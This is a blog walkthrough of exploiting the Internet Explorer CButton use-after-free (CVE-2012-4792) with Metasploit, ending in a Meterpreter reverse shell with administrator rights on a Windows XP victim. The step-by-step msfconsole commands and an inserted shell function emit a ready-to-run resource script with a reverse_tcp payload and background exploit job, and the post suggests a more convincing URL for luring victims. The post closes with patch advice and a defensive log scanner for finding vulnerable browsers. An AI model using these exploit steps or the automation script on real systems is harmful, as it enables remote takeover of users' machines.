Latest Internet Explorer Zero-Day Exploit Walkthrough using Metasploit

[Screenshot: IE Zero Day 2]

The end of the year saw several zero-day exploits released: one for RealPlayer version 15 and under, one for the Nvidia Windows display driver service (a local privilege escalation, not a remote bug), and the one we will focus on today, a remote code execution exploit for Internet Explorer versions 6 through 8. The Internet Explorer zero-day (CVE-2012-4792, a use-after-free involving the CButton object, which is where the Metasploit module gets its name) was publicly acknowledged by Microsoft on December 29th and affects IE 6, 7 and 8 on Windows XP SP3, Vista, Windows 7 and Server 2003 and 2008. Systems running IE 9 and 10 are not affected.

Exploit code has been publicly released and a module has already been added to Metasploit (exploit/windows/browser/ie_cbutton_uaf). We will demonstrate it using Backtrack 5r3 as the attacker and a Windows XP SP3 system with a vulnerable IE as the victim.

So let’s get started.

  • Boot up your Backtrack 5 system and run the msfupdate command to make sure you get the latest exploits.

(I have had a heck of a time running the updates lately. Most recently it seemed to hang on updating an outlook.rb file. I got past it earlier by deleting the file and re-running the update. But for this example we won’t be needing it, so you can just hit (p) for postpone if it hangs on updating it.)

  • Next start the msfconsole.
  • Now you can search for the Internet Explorer exploit by typing “search internet explorer” or, if you already know the module name, select it directly as below.

At the msf> prompt type:

  • use exploit/windows/browser/ie_cbutton_uaf

Then type “show options” to see what options can be set:

[Screenshot: IE Zero Day 2]

Okay, we will need to set the SRVHOST option: this is the address the exploit web server binds to and the address the victim’s browser will be sent to, so it must be the IP of our Backtrack system. We can also change the URIPATH from the default random string to something more convincing if we want. But first, let’s set the target. The module defaults to Windows 7, and our victim in this example is a Windows XP SP3 system, so pick the XP SP3 entry from “show targets” and select it with “set target”:

[Screenshot: IE Zero Day 1]

Next, set the IP address of your Backtrack system:

  • set SRVHOST 192.168.0.120

And finally run the exploit:

  • exploit

[Screenshot: IE Zero Day 4-1]
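The whole msfconsole sequence above, from “use” through “exploit”, can be replayed without the interactive prompt from a resource script, which is handy when you repeat the demo. The shell function below is an added example; it is not code from the original post or from Metasploit. It writes such a script to stdout. The payload (windows/meterpreter/reverse_tcp with LHOST set to the same address as SRVHOST), SRVPORT 8080, the sample address 192.168.0.120 and the target id are assumptions not stated in the post: read the id for the Windows XP SP3 entry off “show targets” in your Metasploit version.

```shell
#!/bin/sh
# Added example (not from the original post or from Metasploit): emit a
# msfconsole resource script that replays the walkthrough non-interactively.
# Assumptions not stated on the page: payload windows/meterpreter/reverse_tcp
# with LHOST = SRVHOST, SRVPORT 8080, and a numeric target id taken from
# "show targets" for the "IE 8 on Windows XP SP3" entry.
#
# Usage: gen_ie_cbutton_rc <srvhost> <target-id> [uripath] > ie_cbutton.rc
#        msfconsole -r ie_cbutton.rc
gen_ie_cbutton_rc() {
    srvhost=$1
    target=$2
    uripath=$3      # optional; leave empty to keep Metasploit's random path

    # Refuse anything that is not a dotted-quad IPv4 address: a typo here
    # sends the victim to the wrong host and the session never comes back.
    case $srvhost in
        ""|*[!0-9.]*)
            echo "gen_ie_cbutton_rc: bad SRVHOST '$srvhost'" >&2
            return 1 ;;
    esac
    case $target in
        ""|*[!0-9]*)
            echo "gen_ie_cbutton_rc: target id must be numeric" >&2
            return 1 ;;
    esac

    printf 'use exploit/windows/browser/ie_cbutton_uaf\n'
    printf 'set TARGET %s\n' "$target"
    printf 'set SRVHOST %s\n' "$srvhost"
    printf 'set SRVPORT 8080\n'
    if [ -n "$uripath" ]; then
        printf 'set URIPATH %s\n' "$uripath"
    fi
    printf 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
    printf 'set LHOST %s\n' "$srvhost"
    # -j runs the exploit server as a background job and -z does not
    # auto-interact with the first session, so the console stays free
    # for "sessions -l" when victims start connecting back.
    printf 'exploit -j -z\n'
}

# Example invocation (192.168.0.120 and target id 1 are placeholders):
gen_ie_cbutton_rc 192.168.0.120 1 /update
```

Run `gen_ie_cbutton_rc 192.168.0.120 <xp-target-id> /update > ie_cbutton.rc` and then `msfconsole -r ie_cbutton.rc`; the console comes up with the exploit server already listening and you can go straight to browsing from the victim and to “sessions -l”.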

Okay, at this point Metasploit starts its own built-in web server (not Apache) on SRVHOST:SRVPORT, port 8080 by default, builds the exploit page and serves it under the random URIPATH, while the payload handler waits for the victim to connect back. Now all we need is to browse to the URL Metasploit printed, using Internet Explorer on the Windows XP system:

[Screenshot: IE Zero Day 3]

That is it!

As soon as the user browses to our Backtrack page, the exploit runs inside Internet Explorer and a remote Meterpreter session is created:

[Screenshot: IE Zero Day 4-2]

(Note: There were no real warnings or alerts on the Windows XP side. It just seemed that the webpage didn’t do anything.)

We can type “sessions -l” to list all the remote shell sessions that Backtrack has created.

[Screenshot: IE Zero Day 5]

As you can see our Windows XP session is listed. Connect to it interactively (sessions -i 1) and run “getuid”. The session runs as whichever user was browsing, and on a default Windows XP install that user is a local administrator, so we have an administrator-level shell:

[Screenshot: IE Zero Day 6]

And simply running “shell” drops us into the full remote shell:

[Screenshot: IE Zero Day 7]

So how do we stop this attack? If you are running IE 6, 7 or 8, UPDATE NOW! This attack does not work against IE 9 or 10. Microsoft was expected to release a patch for the older IE versions today (the January 8th Patch Tuesday) to stop this attack, but they didn’t. Until a patch ships, the stopgaps in Microsoft’s advisory are the “Fix it” shim for the affected IE versions and running EMET.

And since the real fix is simply to upgrade to the newest version, they probably won’t any time soon.

The fix is the same for the RealPlayer and Nvidia zero-days I mentioned earlier: install the latest updates of the affected software to protect against the exploits.
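Before you can tell people to update, you need to know who is still running an affected browser. The script below is an added example, not something from the original post: it picks Internet Explorer 6, 7 and 8 clients out of web server or proxy access logs in combined format, and the log lines in it are constructed for the example. One caveat it handles: IE 9 and 10 in Compatibility View send “MSIE 7.0” in the User-Agent, so the script trusts the Trident/ engine token (4.0 = IE 8, 5.0 = IE 9, 6.0 = IE 10) over the MSIE token when both are present and does not flag those clients.

```shell
#!/bin/sh
# Added example (not from the original post): find Internet Explorer 6-8
# clients, the versions affected by the CButton use-after-free, in
# combined-format access logs.

# Print the effective IE major version for a User-Agent string, or return 1
# if it is not Internet Explorer. The Trident token identifies the real
# engine even when Compatibility View makes IE 9/10 claim to be "MSIE 7.0".
ie_major() {
    msie=$(printf '%s\n' "$1" | sed -n 's/.*MSIE \([0-9][0-9]*\)\.[0-9].*/\1/p')
    [ -n "$msie" ] || return 1
    trident=$(printf '%s\n' "$1" | sed -n 's/.*Trident\/\([0-9][0-9]*\)\.[0-9].*/\1/p')
    case $trident in
        4) msie=8 ;;
        5) msie=9 ;;
        6) msie=10 ;;
    esac
    echo "$msie"
}

# Return 0 when the User-Agent belongs to an affected IE version (6, 7 or 8).
vulnerable_ie() {
    v=$(ie_major "$1") || return 1
    case $v in
        6|7|8) return 0 ;;
    esac
    return 1
}

# Map the "Windows NT x.y" token to a product name for the inventory report.
windows_name() {
    case $1 in
        "")  echo "unknown Windows" ;;
        5.1) echo "Windows XP" ;;
        5.2) echo "Windows Server 2003" ;;
        6.0) echo "Windows Vista / Server 2008" ;;
        6.1) echo "Windows 7 / Server 2008 R2" ;;
        *)   echo "Windows NT $1" ;;
    esac
}

# Read combined-format log lines on stdin; print "client-ip IEn product"
# for every request that came from an affected browser.
scan_log() {
    while IFS= read -r line; do
        ua=${line##*\" \"}      # the last quoted field is the User-Agent
        ua=${ua%\"}
        if vulnerable_ie "$ua"; then
            nt=$(printf '%s\n' "$ua" | sed -n 's/.*Windows NT \([0-9]*\.[0-9]*\).*/\1/p')
            printf '%s IE%s %s\n' "${line%% *}" "$(ie_major "$ua")" "$(windows_name "$nt")"
        fi
    done
}

# Constructed sample log (not real traffic): IE 8 on XP, IE 9 on Windows 7,
# IE 9 in Compatibility View, IE 6 on XP, and a Firefox client.
SAMPLE_LOG='192.168.0.55 - - [08/Jan/2013:10:01:02 -0500] "GET /Nq3vH7 HTTP/1.1" 200 1024 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
192.168.0.56 - - [08/Jan/2013:10:01:09 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
192.168.0.57 - - [08/Jan/2013:10:02:15 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)"
192.168.0.58 - - [08/Jan/2013:10:03:41 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
192.168.0.59 - - [08/Jan/2013:10:04:00 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"'

# Only the two XP clients on IE 8 and IE 6 are reported.
printf '%s\n' "$SAMPLE_LOG" | scan_log
```

Pipe a real access log into `scan_log` (or `sort -u` its output) to get the list of machines to chase; the same check also tells you which of your own test hosts a browser exploit like the one above can still reach.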


~ by D. Dieterle on January 8, 2013.

2 Responses to “Latest Internet Explorer Zero-Day Exploit Walkthrough using Metasploit”

  1. [...] to Microsoft, the issue is “under limited exploit in the wild”; however, there is a Metasploit module available which can theoretically exploit the [...]

  2. [...] According to Microsoft, the vulnerability has only been exploited in a few cases. However, there is a Metasploit module with which, in theory, anyone can exploit the hole [...]
